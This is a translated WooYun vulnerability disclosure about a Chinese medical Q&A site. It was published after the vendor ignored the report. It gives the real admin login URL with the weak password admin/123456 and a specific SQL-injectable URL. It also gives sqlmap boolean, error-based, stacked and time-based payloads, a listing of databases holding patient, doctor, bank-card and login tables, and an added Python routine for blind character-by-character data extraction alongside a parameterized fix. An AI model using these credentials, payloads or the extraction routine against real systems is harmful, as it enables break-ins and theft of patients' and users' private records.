
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0168472

Title: ios问答网 admin back end weak password plus SQL injection

Vendor: ios问答网

Author: 路人甲

Submitted: 2016-01-08 17:46

Fix deadline: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-01-08: Actively contacting the vendor and waiting for it to claim the report; details not disclosed
2016-02-22: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The ios问答网 admin back end has a weak password, and a page behind it is SQL-injectable.

Detailed description:

Admin back end: http://test.iosask.cn/dgws/
Credentials: admin / 123456
Injection point: http://test.iosask.cn/dgws/home/mycure/patientinfo?aid=734
The aid parameter is injectable. sqlmap output follows.

Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=734' AND 6072=6072 AND 'iEao'='iEao

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=734' AND (SELECT 5706 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(5706=5706,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mgKj'='mgKj

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: aid=734';(SELECT * FROM (SELECT(SLEEP(5)))PfLV)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: aid=734' AND (SELECT * FROM (SELECT(SLEEP(5)))YeFt) AND 'RCiv'='RCiv
---
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0
available databases [19]:
[*] db_admin
[*] db_api
[*] db_auth
[*] db_bug
[*] db_doctor
[*] db_file
[*] db_log
[*] db_msg
[*] db_query
[*] db_room
[*] db_sys
[*] db_uc
[*] db_uc_web
[*] db_user
[*] db_user_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: db_admin
[16 tables]
+----------------------------------------------+
| t_admin_article |
| t_admin_article_picture |
| t_admin_banner_picture |
| t_admin_info |
| t_admin_level |
| t_admin_login_info |
| t_admin_operation_info |
| t_admin_programa |
| t_admin_work_calender |
| t_admin_work_notice |
| t_doctor_admin_appointment |
| t_user_question_answer |
| t_user_question_info |
| t_website_column_info |
| t_website_content |
| t_website_leave_msg |
+----------------------------------------------+
Database: db_log
[33 tables]
+----------------------------------------------+
| t_log_ad_click |
| t_log_admin_op |
| t_log_admin_work_calender |
| t_log_apns_push |
| t_log_apns_push_count |
| t_log_apns_push_fail |
| t_log_diagnosis_record |
| t_log_diagnosis_record_sugguest |
| t_log_doctor_appointment |
| t_log_doctor_appointment_dt |
| t_log_doctor_assistant_phone |
| t_log_doctor_refuse_inquiry |
| t_log_doctor_withdrawal |
| t_log_input_medical_record |
| t_log_msg |
| t_log_patient_activist_info |
| t_log_patient_auxiliary_check |
| t_log_patient_auxiliary_record |
| t_log_patient_diagnosis_evaluate |
| t_log_pwd_retrieve |
| t_log_receipt |
| t_log_tns |
| t_log_user_account_freeze |
| t_log_user_active |
| t_log_user_login |
| t_log_user_online |
| t_log_user_online_count |
| t_log_user_refund_op |
| t_log_user_refund_order |
| t_log_user_reg |
| t_log_user_reg_count |
| t_log_user_sms |
| t_log_user_value_change |
+----------------------------------------------+
Database: db_auth
[4 tables]
+----------------------------------------------+
| t_auth_group |
| t_auth_group_access |
| t_auth_rule |
| t_user |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: db_bug
[3 tables]
+----------------------------------------------+
| t_log_android_bugs |
| t_log_ios_bugs |
| t_server_gk_ip |
+----------------------------------------------+
Database: db_sys
[11 tables]
+----------------------------------------------+
| t_client_version_info |
| t_pes_info |
| t_pgks_info |
| t_sys_ad_cfg |
| t_sys_auxiliary_cfg |
| t_sys_auxiliary_cfg_copy |
| t_sys_channel_cfg |
| t_sys_nation_cfg |
| t_sys_picture |
| t_sys_process_cfg |
| t_sys_province |
+----------------------------------------------+
Database: db_doctor
[43 tables]
+----------------------------------------------+
| 医生信息 |
| 医院信息 |
| t_appointment_auxiliary_check |
| t_appointment_diagnosis_picture |
| t_appointment_material_remind |
| t_assistant_doctor_info |
| t_department_disease_cfg |
| t_disease_auxiliary_check |
| t_doctor_appointment |
| t_doctor_appointment_apply |
| t_doctor_appointment_dt |
| t_doctor_appointment_ex |
| t_doctor_appointment_label |
| t_doctor_appointment_tourist |
| t_doctor_appointment_upd |
| t_doctor_auxiliary_check |
| t_doctor_case |
| t_doctor_cure_disease |
| t_doctor_department_apply |
| t_doctor_department_info |
| t_doctor_department_picture |
| t_doctor_diagnosis_record |
| t_doctor_disease_detail |
| t_doctor_hospital_info |
| t_doctor_info |
| t_doctor_message |
| t_doctor_power |
| t_doctor_recommend_pool |
| t_doctor_refuse_inquiry |
| t_doctor_team_fees |
| t_doctor_withdrawal |
| t_label_info |
| t_medical_record_remark |
| t_patient_activist_info |
| t_patient_auxiliary_check |
| t_patient_diagnosis_evaluate |
| t_patient_drug_plan |
| t_patient_history_info |
| t_patient_info |
| t_patient_operation_plan |
| t_patient_physical_plan |
| t_patient_visit_record |
| v_doctor_base_info |
+----------------------------------------------+
Database: db_msg
[3 tables]
+----------------------------------------------+
| t_appointment_pecipe_msg |
| t_msg_cache |
| t_msg_ios_devicetoken |
+----------------------------------------------+
Database: db_room
[1 table]
+----------------------------------------------+
| t_room_record |
+----------------------------------------------+
Database: db_api
[4 tables]
+----------------------------------------------+
| t_api_config |
| t_api_info |
| t_api_token |
| t_tns_push |
+----------------------------------------------+
Current database
[1 table]
+----------------------------------------------+
| t_patient_order_info |
+----------------------------------------------+
Database: db_uc_web
[2 tables]
+----------------------------------------------+
| t_user_refund_op |
| t_user_refund_order |
+----------------------------------------------+
Database: db_user_web
[3 tables]
+----------------------------------------------+
| t_user_bank_card |
| t_user_collect |
| t_user_label |
+----------------------------------------------+
Database: db_user
[5 tables]
+----------------------------------------------+
| t_user_authen |
| t_user_location |
| t_user_profile |
| t_user_status |
| v_user_base_info |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: db_uc
[7 tables]
+----------------------------------------------+
| t_doctor_bill |
| t_user_account_freeze |
| t_user_commonpay_receipt |
| t_user_config |
| t_user_currency_value |
| t_user_recharge_record |
| t_user_refund_order |
+----------------------------------------------+
Database: db_file
[1 table]
+----------------------------------------------+
| t_file |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| None |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: db_query
[15 tables]
+----------------------------------------------+
| t_sys_reg_time_bucket |
| t_sys_sms_info |
| t_sys_sms_receive_dt |
| t_uid_account |
| t_uid_assign |
| t_uid_release_cfg |
| t_uid_release_info |
| t_uid_unassign |
| t_user_avatar_authen |
| t_user_device_install |
| t_user_kefu_notice |
| t_user_login |
| t_user_power_info |
| t_user_sms_shield |
| t_user_uninstall |
+----------------------------------------------+
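The injection sqlmap reports above, reduced to the code pattern behind it, as an added example that is not part of the original report or of the ios问答网 code base: a lookup that splices aid into a single-quoted string literal (which is what the quote-prefixed payloads imply) beside the parameterized form, plus the yes/no inference that boolean-based blind injection relies on, carried through to recovering a column value character by character. The table and column names, the sample rows, and the use of SQLite as a stand-in for the MySQL back end are constructed assumptions.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed sample rows standing in for the patient table behind
# /dgws/home/mycure/patientinfo?aid=<id>.  Table and column names are
# assumptions, not taken from the report.
SAMPLE_ROWS = [
    (733, "patient-733", "notes A"),
    (734, "patient-734", "notes B"),
    (735, "patient-735", "notes C"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL back end (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE t_patient_info (aid INTEGER PRIMARY KEY, name TEXT, notes TEXT)"
    )
    conn.executemany("INSERT INTO t_patient_info VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def patientinfo_vulnerable(conn: sqlite3.Connection, aid: str) -> Optional[Tuple]:
    """The code pattern the report's payloads imply: the request parameter is
    spliced into a single-quoted literal, so a quote in `aid` ends the literal
    and the rest of the string is parsed as SQL."""
    sql = "SELECT aid, name, notes FROM t_patient_info WHERE aid = '" + aid + "'"
    return conn.execute(sql).fetchone()


def patientinfo_fixed(conn: sqlite3.Connection, aid: str) -> Optional[Tuple]:
    """Hardened form: validate that the id is numeric, then bind it as a
    parameter so the database never parses it as SQL."""
    if not aid.isdigit():
        return None
    return conn.execute(
        "SELECT aid, name, notes FROM t_patient_info WHERE aid = ?", (int(aid),)
    ).fetchone()


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """What 'boolean-based blind' means in the sqlmap output: the attacker
    cannot read query results directly, but can append a condition to the
    record-734 lookup and see whether the page still renders that record.
    Same payload shape as the report, with the condition swapped in."""
    payload = f"734' AND ({condition}) AND 'iEao'='iEao"
    return patientinfo_vulnerable(conn, payload) is not None


def extract_blind(conn: sqlite3.Connection, expr: str, max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time through
    the yes/no oracle, by binary search over the code point (the inference
    sqlmap automates).  SQLite's substr()/unicode() stand in for MySQL's
    SUBSTRING()/ASCII()."""
    out = []
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(conn, f"unicode(substr({expr}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end yields '' and unicode('') is NULL
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    true_p = "734' AND 6072=6072 AND 'iEao'='iEao"
    false_p = "734' AND 6072=6073 AND 'iEao'='iEao"
    print("vulnerable, true condition: ", patientinfo_vulnerable(db, true_p))
    print("vulnerable, false condition:", patientinfo_vulnerable(db, false_p))
    print("fixed, same payload:        ", patientinfo_fixed(db, true_p))
    print("blind extraction of name:   ", extract_blind(db, "name"))
```

Two things in the sqlmap output that the example does not reproduce matter when judging impact: the error-based technique works because the page echoes MySQL error text back to the client, and the stacked-queries finding means the application's database layer accepted a second statement after `;`, so the exposure is not limited to reading the 19 databases listed.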

Proof of vulnerability:

The report repeats the detailed description above verbatim as its proof.


Fix recommendation:

You are more expert at this than I am.

Copyright notice: credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused the report